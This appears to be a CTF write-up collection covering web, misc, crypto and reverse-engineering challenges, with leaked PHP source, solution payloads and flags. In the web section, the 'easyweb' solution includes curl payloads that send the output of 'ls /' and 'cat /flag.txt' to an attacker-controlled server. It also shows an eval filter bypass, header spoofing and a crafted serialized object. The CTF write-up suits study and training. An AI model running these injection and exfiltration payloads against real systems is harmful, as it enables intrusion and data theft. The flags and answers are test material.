WEB

YWB_Web_xff

The source code is leaked:

<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    // X-Forwarded-For is a request header, so its value is chosen by the client
    $cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
    if ($cip == "2.2.2.1") {
        echo '<div class="success">';
        echo '<h2>登录成功!</h2>';
        $flag = file_get_contents('/flag.txt');
        echo '<p>flag{' . htmlspecialchars($flag) . '}</p>';
        echo '</div>';
    } else {
        echo '<div class="error">';
        echo '<h2>登录失败</h2>';
        echo '<p>IP地址验证失败</p>';
        echo '<p>当前IP: ' . htmlspecialchars($cip) . '</p>';
        echo '</div>';
    }
}


flag{9u60w1kemajt}

YWB_Web_Unauthorized Access

SSTI went nowhere. Noticing that there was a cookie, changing the cookie gave the flag.


flag{rpuqari28i9l}

easyweb

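<?php

if (isset($_POST['cmd'])) {
    @exec($_POST['cmd'], $res, $rc);
    //echo $rc;
} else {
    echo "It works!";
}

show_source(__FILE__);
?>

The output of exec() is never echoed, so the command result is sent out to your own server:

cmd=curl <your server IP>:<port> --data "$(ls /)"
cmd=curl <your server IP>:<port> --data "$(cat /flag.txt)"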


flag{d4ek6s7kzztx}

YWB_Web_Command Execution Filter Bypass

<?php
# flag in flag.php
include("flag.php");
if (isset($_GET['cmd'])) {
    $cmd = $_GET['cmd'];
    if (!preg_match("/system|exec|highlight|show_source|include|passthru|echo|print_r|cat|head|tail|more|less/i", $cmd)) {
        if (preg_match("/flag/i", $cmd)) {
            eval($cmd);
        } else {
            die("HACK!!");
        }
    } else {
        die("HACK!!!");
    }
} else {
    highlight_file(__FILE__);
}
?>

cmd=readfile('flag.php');

This returns the source:

<?
$filename = "/tmp/flag.nisp";
$content = trim(file_get_contents($filename));
?>

cmd=readfile('/tmp/flag.nisp');


flag{dnu3stfgjy61}

YWB_Web_Deserialization

The source is:

<?php
function filter($name){
    $safe = array("flag", "php");
    return str_replace($safe, "hack", $name);
}

class mylogin {
    var $user;
    var $pass;

    function __construct($user, $pass) {
        $this->user = $user;
        $this->pass = $pass;
    }
}

if ($_POST['msg']) {
    $filtered_input = filter($_POST['msg']);

    $a = unserialize($filtered_input);

    if ($a instanceof mylogin) {
        if ($a->pass === "myzS@11wawq") {
            exit();
        } else {
            $tis = "您是小自吧,差一点就成功了!";
        }
    } else {
        $tis = "您输入的信息可能去非洲才能找到哦!";
    }
}
?>

Just build the object directly and serialize it:

<?php
function filter($name){
    $safe = array("flag", "php");
    return str_replace($safe, "hack", $name);
}

class mylogin {
    var $user;
    var $pass;

    function __construct($user, $pass) {
        $this->user = $user;
        $this->pass = $pass;
    }
}
$a = new mylogin('user', 'myzS@11wawq');
echo serialize($a);
//O:7:"mylogin":2:{s:4:"user";s:4:"user";s:4:"pass";s:11:"myzS@11wawq";}

MISC

ez_xor

A first attempt: after removing the "-" characters, the XOR characters turn out to be 9999…


XOR everything with it to get the flag.


flag{HCTFqweASD182}

The Parasitic Key in the Light Gap

First extract an archive with binwalk. It requires a password, so try brute-forcing it, which gives the password 9864.


Then hex decoding followed by base64 decoding gives the flag.


flag{!sK8hF3^vG7mX2qD}

The Folded Developing Blueprint


flag{0???c3_3@$Y_cR@Qk3!}

CRYPTO

cry_rsa

In an RSA key pair generation, suppose p=473398607161, q=4511491, e=19.
Solve for d, then add 6 to the value of d to get the flag value. The flag format is flag{********}

def mod_inverse(e, phi):
    # Extended Euclid: returns (gcd, x, y) with a*x + b*y == gcd
    def egcd(a, b):
        if a == 0:
            return b, 0, 1
        gcd, x1, y1 = egcd(b % a, a)
        x = y1 - (b // a) * x1
        y = x1
        return gcd, x, y

    _, x, _ = egcd(e, phi)
    return (x % phi + phi) % phi

p = 473398607161
q = 4511491
e = 19

n = p * q
phi = (p - 1) * (q - 1)
d = mod_inverse(e, phi)
flag_value = d + 6
flag = f"flag{{{flag_value}}}"

print(flag)


flag{2023326077889096385}

gift

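On May Day (Labor Day) Dad brought the family a gift. Because the gift was awkward to carry, he divided it evenly into four portions, but one of them was accidentally dropped on the floor and scattered into countless pieces, becoming 1 - 1/3 + 1/5 - 1/7 + …
Clever as you are, can you work out or guess what gift Dad brought? Flag examples: flag{apple} flag{watermelon}. Encrypt the flag value with a Caesar cipher, offset 10, before submitting.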

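First compute the value of the series, which is π/4. Multiplied by 4 it becomes π, so the answer can be "pie", which after the shift is "zso".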

flag{zso}

The Secret Words of the Meadow Square

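Opening the file in Notepad shows mt2s6Zhu5nWA{87Uxc4Y}. Going by the challenge title, this is presumably a rail fence cipher plus a Caesar cipher.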

Rail fence decryption with 7 rails gives mshn{U4t6uW8xY2Z5A7c}, and a Caesar shift of 7 then gives the flag.


flag{N4m6nP8qR2S5T7v}
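
The fence step and both Caesar steps (offset 10 in gift, offset 7 here) can be reproduced with the short script below. It is an added example, not code from the original write-up; the function names are hypothetical, and it assumes "7 rails" means seven equal groups read column by column, which is the reading that reproduces the intermediate string mshn{U4t6uW8xY2Z5A7c}.

```python
import math


def unrail(ciphertext: str, groups: int) -> str:
    """Undo the simple (non-zigzag) fence: cut the text into `groups`
    equal rows and read the rows column by column."""
    if len(ciphertext) % groups:
        raise ValueError("length must be a multiple of the group count")
    width = len(ciphertext) // groups
    rows = [ciphertext[i * width:(i + 1) * width] for i in range(groups)]
    return "".join(row[col] for col in range(width) for row in rows)


def caesar(text: str, shift: int) -> str:
    """Shift ASCII letters by `shift`; digits and punctuation are unchanged."""
    out = []
    for ch in text:
        if ch.isascii() and ch.isalpha():
            base = ord("a") if ch.islower() else ord("A")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def leibniz_times_four(terms: int) -> float:
    """4 * (1 - 1/3 + 1/5 - 1/7 + ...), the series from the gift challenge."""
    return 4 * sum((-1) ** k / (2 * k + 1) for k in range(terms))


def solve_meadow(ciphertext: str = "mt2s6Zhu5nWA{87Uxc4Y}") -> str:
    # Ciphertext is the string quoted in the write-up: fence first, then shift back by 7.
    return caesar(unrail(ciphertext, 7), -7)


if __name__ == "__main__":
    print(round(leibniz_times_four(10_000), 3), round(math.pi, 3))
    print(caesar("pie", 10))
    print(unrail("mt2s6Zhu5nWA{87Uxc4Y}", 7))
    print(solve_meadow())
```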

easy-Sign-in challenge

CyberChef solves it in one go.


flag{e3965207-1a4c-8b3d-6f2e-570193482b6a}

ez_base

Decoding with the online site https://www.spammimic.com/decode.cgi gives a base64 string; decoding that gives the flag.


flag{HNCTFlnlN81TXzo10TF}

RE

sign in

First unpack the binary with upx, then load the resulting file into IDA for analysis. RC4 decryption is required.


# Initial data for the key
v1 = [
    0xB8C6B89FC8B99FC8,
    0xCFB7B0C51443528F,
    0xB1A8C6B99BC7AC9C,
    0xBDC68AB3C59299C5
]
v2 = -1499806587

# Build the key
key = b''
for num in v1:
    key += num.to_bytes(8, 'little')  # each value in v1 as 8 little-endian bytes
key += v2.to_bytes(4, 'little', signed=True)  # v2 as 4 little-endian bytes, appended to the key

# Initial data for the ciphertext
v3 = [
    0x97124DF289B15A46,
    0xB9D8B54F60840402,
    0xB522866085D4D908
]
cipher = b''
for num in v3:
    cipher += num.to_bytes(8, 'little')  # each value in v3 as 8 little-endian bytes

# Handle the overwritten part of v4
v4_initial = (0xA565739C2C9A1F21).to_bytes(8, 'little')  # the initial 8 bytes of v4
overwrite_val = 0x2AC6CE0FA6F5A5
overwrite_bytes = overwrite_val.to_bytes(8, 'little')  # the 8 bytes that overwrite it

# Merge the initial bytes of v4 with the overwriting bytes
v4_part = bytearray(v4_initial[:7])  # first 7 bytes of the initial v4
v4_part += overwrite_bytes  # append the 8 overwriting bytes
cipher += bytes(v4_part)  # append v4_part to the ciphertext

# RC4 decryption function
def rc4_decrypt(key, ciphertext):
    S = list(range(256))  # initialise the S-box
    j = 0
    # Key scheduling: permute the S-box with the key
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # Generate the keystream and decrypt
    i = j = 0
    plain = []
    for byte in ciphertext:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        k = S[(S[i] + S[j]) % 256]
        plain.append(byte ^ k)
    return bytes(plain)

# Decrypt the ciphertext with RC4 and print the result
flag = rc4_decrypt(key, cipher)
print("Flag:", flag.decode('latin-1', errors='replace'))


flag{9bb8dc2af053d3a8f9d5f410eb5278a5}